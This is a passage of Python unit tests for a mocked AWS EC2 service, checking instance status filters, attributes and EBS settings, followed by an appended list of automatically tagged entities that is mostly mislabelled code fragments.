volumes = ec2_client.describe_volumes(VolumeIds=[volume["VolumeId"]])
volumes["Volumes"][0]["Size"].should.equal(30)
volumes["Volumes"][0]["SnapshotId"].should.equal(snapshot.snapshot_id)
@mock_ec2_deprecated
def test_describe_instance_status_no_instances():
conn = boto.connect_ec2("the_key", "the_secret")
all_status = conn.get_all_instance_status()
len(all_status).should.equal(0)
@mock_ec2_deprecated
def test_describe_instance_status_with_instances():
conn = boto.connect_ec2("the_key", "the_secret")
conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
all_status = conn.get_all_instance_status()
len(all_status).should.equal(1)
all_status[0].instance_status.status.should.equal("ok")
all_status[0].system_status.status.should.equal("ok")
@mock_ec2_deprecated
def test_describe_instance_status_with_instance_filter_deprecated():
conn = boto.connect_ec2("the_key", "the_secret")
# We want to filter based on this one
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
instance = reservation.instances[0]
# This is just to setup the test
conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
all_status = conn.get_all_instance_status(instance_ids=[instance.id])
len(all_status).should.equal(1)
all_status[0].id.should.equal(instance.id)
# Call get_all_instance_status with a bad id should raise an error
with pytest.raises(EC2ResponseError) as cm:
conn.get_all_instance_status(instance_ids=[instance.id, "i-1234abcd"])
cm.value.code.should.equal("InvalidInstanceID.NotFound")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2
def test_describe_instance_credit_specifications():
conn = boto3.client("ec2", region_name="us-west-1")
# We want to filter based on this one
reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
result = conn.describe_instance_credit_specifications(
InstanceIds=[reservation["Instances"][0]["InstanceId"]]
)
assert (
result["InstanceCreditSpecifications"][0]["InstanceId"]
== reservation["Instances"][0]["InstanceId"]
)
@mock_ec2
def test_describe_instance_status_with_instance_filter():
conn = boto3.client("ec2", region_name="us-west-1")
# We want to filter based on this one
reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=3, MaxCount=3)
instance1 = reservation["Instances"][0]
instance2 = reservation["Instances"][1]
instance3 = reservation["Instances"][2]
conn.stop_instances(InstanceIds=[instance1["InstanceId"]])
stopped_instance_ids = [instance1["InstanceId"]]
running_instance_ids = sorted([instance2["InstanceId"], instance3["InstanceId"]])
all_instance_ids = sorted(stopped_instance_ids + running_instance_ids)
# Filter instance using the state name
state_name_filter = {
"running_and_stopped": [
{"Name": "instance-state-name", "Values": ["running", "stopped"]}
],
"running": [{"Name": "instance-state-name", "Values": ["running"]}],
"stopped": [{"Name": "instance-state-name", "Values": ["stopped"]}],
}
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter["running_and_stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(all_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter["running"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(running_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter["stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(stopped_instance_ids)
# Filter instance using the state code
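    # (EC2 instance-state codes: 0=pending, 16=running, 32=shutting-down,
    # 48=terminated, 64=stopping, 80=stopped; hence the "16" and "80" below.)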
state_code_filter = {
"running_and_stopped": [
{"Name": "instance-state-code", "Values": ["16", "80"]}
],
"running": [{"Name": "instance-state-code", "Values": ["16"]}],
"stopped": [{"Name": "instance-state-code", "Values": ["80"]}],
}
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter["running_and_stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(all_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter["running"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(running_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter["stopped"]
)["InstanceStatuses"]
found_instance_ids = [status["InstanceId"] for status in found_statuses]
sorted(found_instance_ids).should.equal(stopped_instance_ids)
@requires_boto_gte("2.32.0")
@mock_ec2_deprecated
def test_describe_instance_status_with_non_running_instances():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.stop()
instance2.terminate()
all_running_status = conn.get_all_instance_status()
all_running_status.should.have.length_of(1)
all_running_status[0].id.should.equal(instance3.id)
all_running_status[0].state_name.should.equal("running")
all_status = conn.get_all_instance_status(include_all_instances=True)
all_status.should.have.length_of(3)
status1 = next((s for s in all_status if s.id == instance1.id), None)
status1.state_name.should.equal("stopped")
status2 = next((s for s in all_status if s.id == instance2.id), None)
status2.state_name.should.equal("terminated")
status3 = next((s for s in all_status if s.id == instance3.id), None)
status3.state_name.should.equal("running")
@mock_ec2_deprecated
def test_get_instance_by_security_group():
conn = boto.connect_ec2("the_key", "the_secret")
conn.run_instances(EXAMPLE_AMI_ID)
instance = conn.get_only_instances()[0]
security_group = conn.create_security_group("test", "test")
with pytest.raises(EC2ResponseError) as ex:
conn.modify_instance_attribute(
instance.id, "groupSet", [security_group.id], dry_run=True
)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set"
)
conn.modify_instance_attribute(instance.id, "groupSet", [security_group.id])
security_group_instances = security_group.instances()
assert len(security_group_instances) == 1
assert security_group_instances[0].id == instance.id
@mock_ec2
def test_modify_delete_on_termination():
ec2_client = boto3.resource("ec2", region_name="us-west-1")
result = ec2_client.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
instance = result[0]
instance.load()
instance.block_device_mappings[0]["Ebs"]["DeleteOnTermination"].should.be(True)
instance.modify_attribute(
BlockDeviceMappings=[
{"DeviceName": "/dev/sda1", "Ebs": {"DeleteOnTermination": False}}
]
)
instance.load()
instance.block_device_mappings[0]["Ebs"]["DeleteOnTermination"].should.be(False)
@mock_ec2
def test_create_instance_ebs_optimized():
ec2_resource = boto3.resource("ec2", region_name="eu-west-1")
instance = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, EbsOptimized=True
)[0]
instance.load()
instance.ebs_optimized.should.be(True)
instance.modify_attribute(EbsOptimized={"Value": False})
instance.load()
instance.ebs_optimized.should.be(False)
instance = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1,
)[0]
instance.load()
instance.ebs_optimized.should.be(False)
@mock_ec2
def test_run_multiple_instances_in_same_command():
instance_count = 4
client = boto3.client("ec2", region_name="us-east-1")
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=instance_count, MaxCount=instance_count
)
reservations = client.describe_instances()["Reservations"]
reservations[0]["Instances"].should.have.length_of(instance_count)
instances = reservations[0]["Instances"]
for i in range(0, instance_count):
instances[i]["AmiLaunchIndex"].should.be(i)
@mock_ec2
def test_describe_instance_attribute():
client = boto3.client("ec2", region_name="us-east-1")
security_group_id = client.create_security_group(
GroupName="test security group", Description="this is a test security group"
)["GroupId"]
client.run_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
SecurityGroupIds=[security_group_id],
)
instance_id = client.describe_instances()["Reservations"][0]["Instances"][0][
"InstanceId"
]
valid_instance_attributes = [
"instanceType",
"kernel",
"ramdisk",
"userData",
"disableApiTermination",
"instanceInitiatedShutdownBehavior",
"rootDeviceName",
"blockDeviceMapping",
"productCodes",
"sourceDestCheck",
"groupSet",
"ebsOptimized",
"sriovNetSupport",
]
for valid_instance_attribute in valid_instance_attributes:
response = client.describe_instance_attribute(
InstanceId=instance_id, Attribute=valid_instance_attribute
)
if valid_instance_attribute == "groupSet":
response.should.have.key("Groups")
response["Groups"].should.have.length_of(1)
response["Groups"][0]["GroupId"].should.equal(security_group_id)
elif valid_instance_attribute == "userData":
response.should.have.key("UserData")
response["UserData"].should.be.empty
invalid_instance_attributes = [
"abc",
"Kernel",
"RamDisk",
"userdata",
"iNsTaNcEtYpE",
]
for invalid_instance_attribute in invalid_instance_attributes:
with pytest.raises(ClientError) as ex:
client.describe_instance_attribute(
InstanceId=instance_id, Attribute=invalid_instance_attribute
)
ex.value.response["Error"]["Code"].should.equal("InvalidParameterValue")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
message = "Value ({invalid_instance_attribute}) for parameter attribute is invalid. Unknown attribute.".format(
invalid_instance_attribute=invalid_instance_attribute
)
ex.value.response["Error"]["Message"].should.equal(message)
@mock_ec2
def test_warn_on_invalid_ami():
if settings.TEST_SERVER_MODE:
raise SkipTest("Can't capture warnings in server mode.")
ec2 = boto3.resource("ec2", "us-east-1")
with pytest.warns(
PendingDeprecationWarning,
match=r"Could not find AMI with image-id:invalid-ami.+",
):
ec2.create_instances(ImageId="invalid-ami", MinCount=1, MaxCount=1)
| 62,433 | [['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.99.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['PERSON', 'conn = boto.connect_ec2'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'zone=conn.region.name'], ['LOCATION', 'test_get_paginated_instances'], ['PERSON', 'conn = boto3.resource("ec2'], ['PERSON', 'instance3'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_vpc("the_key'], ['LOCATION', 'min_count=1'], ['LOCATION', 'min_count=1'], ['PERSON', 'min_count=1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto3.resource("ec2'], ['PERSON', 'conn = boto3.resource("ec2'], ['PERSON', 'conn = boto3.resource("ec2'], ['PERSON', 'conn = boto3.resource("ec2'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'Boto'], ['PERSON', 'DryRun'], ['PERSON', 'test_user_data_with_run_instance'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_vpc("the_key'], ['PERSON', 'instance.groups.should.have.length_of(2'], ['PERSON', 'conn = boto.connect_vpc("the_key'], ['PERSON', 'Boto'], ['PERSON', 'instance.interfaces.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_vpc("the_key'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'instance.interfaces.should.have.length_of(1'], ['PERSON', 'conn.detach_network_interface("eni-attach-1234abcd'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto3.client("ec2'], ['PERSON', 'conn = boto3.client("ec2'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'conn = boto.connect_ec2("the_key'], ['PERSON', 'DryRun'], ['DATE_TIME', 'test_warn_on_invalid_ami'], ['DATE_TIME', '2014-01-01'], ['DATE_TIME', '2014-01-01'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.1.0.0'], ['IP_ADDRESS', '10.1.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], 
['IP_ADDRESS', '10.0.0.0'], ['URL', 'boto.ec2.in'], ['URL', 'six.PY'], ['URL', 'base64.de'], ['URL', 'base64.de'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'boto.co'], ['URL', 'conn.ge'], ['URL', 'instance1.im'], ['URL', 'boto.ec2.co'], ['URL', 'conn.ru'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.ru'], ['URL', 'reservation.should.be'], ['URL', 'reservation.instances.sh'], ['URL', 'reservation.in'], ['URL', 'instance.state.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.id.sh'], ['URL', 'reservation.id'], ['URL', 'instances.sh'], ['URL', 'instance.id.sh'], ['URL', 'instance.id'], ['URL', 'instance.state.sh'], ['URL', 'instance.la'], ['URL', 'time.sh'], ['URL', 'id.sh'], ['URL', 'instance.placement.sh'], ['URL', 'instance.ro'], ['URL', '.status.sh'], ['URL', 'id.should.ma'], ['URL', 'conn.ge'], ['URL', 'volume.at'], ['URL', 'data.in'], ['URL', 'id.sh'], ['URL', 'instance.id'], ['URL', 'volume.status.sh'], ['URL', 'instance.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'instance.state.sh'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'volume.state.sh'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'instance.de'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'instance.de'], ['URL', 'ex.value.re'], ['URL', 'InvalidAttachment.No'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'instance.in'], ['URL', 'boto.co'], ['URL', 'instances.when.ca'], ['URL', '.should.th'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol1.at'], ['URL', 'instance.id'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol2.at'], ['URL', 'instance.id'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol3.at'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'mapping.sh'], ['URL', 'conn.ge'], ['URL', 'v.at'], ['URL', 'data.in'], ['URL', 'id.sh'], ['URL', 'instance.id'], ['URL', 'v.at'], ['URL', 'data.at'], ['URL', 'time.sh'], ['URL', 'instance.la'], ['URL', 'v.cr'], ['URL', 'time.sh'], ['URL', 'instance.la'], ['URL', 'v.region.name.sh'], ['URL', 'instance.region.na'], ['URL', 'v.status.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'reservations.sh'], ['URL', 'reservation.instances.sh'], ['URL', 'reservation.in'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'reservations.sh'], ['URL', 'reservation.instances.sh'], ['URL', 'instance.id'], ['URL', 'reservation.in'], ['URL', 'ids.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidInstanceID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'token.sh'], ['URL', 'not.be.no'], 
['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'resp2.ke'], ['URL', 'boto3.cl'], ['URL', 'ec2.ru'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'instance.id'], ['URL', 'instance2.id'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'instance2.id'], ['URL', 'reservations.sh'], ['URL', 'instance.id'], ['URL', 'ids.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.when.ca'], ['URL', '.should.th'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', '.instances.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'm1.sm'], ['URL', 'reservation1.in'], ['URL', 'conn.ru'], ['URL', 'm1.sm'], ['URL', 'reservation2.in'], ['URL', 'conn.ru'], ['URL', 'reservation3.in'], ['URL', 'conn.ge'], ['URL', 'm1.sm'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'm1.sm'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.st'], ['URL', 'conn.ge'], ['URL', 'Client.Us'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'i.id'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.mo'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc1.id'], ['URL', 'conn.ru'], ['URL', 'subnet1.id'], ['URL', 'reservation1.in'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc2.id'], ['URL', 'conn.ru'], ['URL', 'subnet2.id'], ['URL', 'reservation2.in'], ['URL', 'conn.ge'], ['URL', 'vpc1.id'], ['URL', 'reservations1.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'id.sh'], ['URL', 'vpc1.id'], ['URL', 'id.sh'], ['URL', 'subnet1.id'], ['URL', 'conn.ge'], ['URL', 'vpc2.id'], ['URL', 'reservations2.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'id.sh'], ['URL', 'vpc2.id'], ['URL', 'id.sh'], ['URL', 'subnet2.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'ip-10-0-0-1.ec2.int'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'network-interface.pr'], 
['URL', 'ip-10-0-0-1.us-west-2.compute.int'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'instance.gr'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'instance.gr'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instances.sh'], ['URL', 'instance.id'], ['URL', 'conn.st'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.st'], ['URL', 'instance.state.sh'], ['URL', 'conn.st'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.st'], ['URL', '.state.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.re'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.re'], ['URL', 'instance.state.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.mo'], ['URL', 'm1.sm'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'm1.sm'], 
['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'm1.sm'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'g.id'], ['URL', '.should.be'], ['URL', 'g.id'], ['URL', '.should.be'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'instance.mo'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'data.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.gr'], ['URL', '.id.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', '.name.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'group.id'], ['URL', 'reservation.in'], ['URL', 'instance.gr'], ['URL', '.id.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', '.name.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.in'], ['URL', 'type.sh'], ['URL', 'boto.ec2.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.placement.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.placement.sh'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'cidr.should.co'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.mo'], ['URL', 'client.ru'], ['URL', 'instance.should.co'], ['URL', 'instance.should.co'], ['URL', '.should.be.gr'], ['URL', 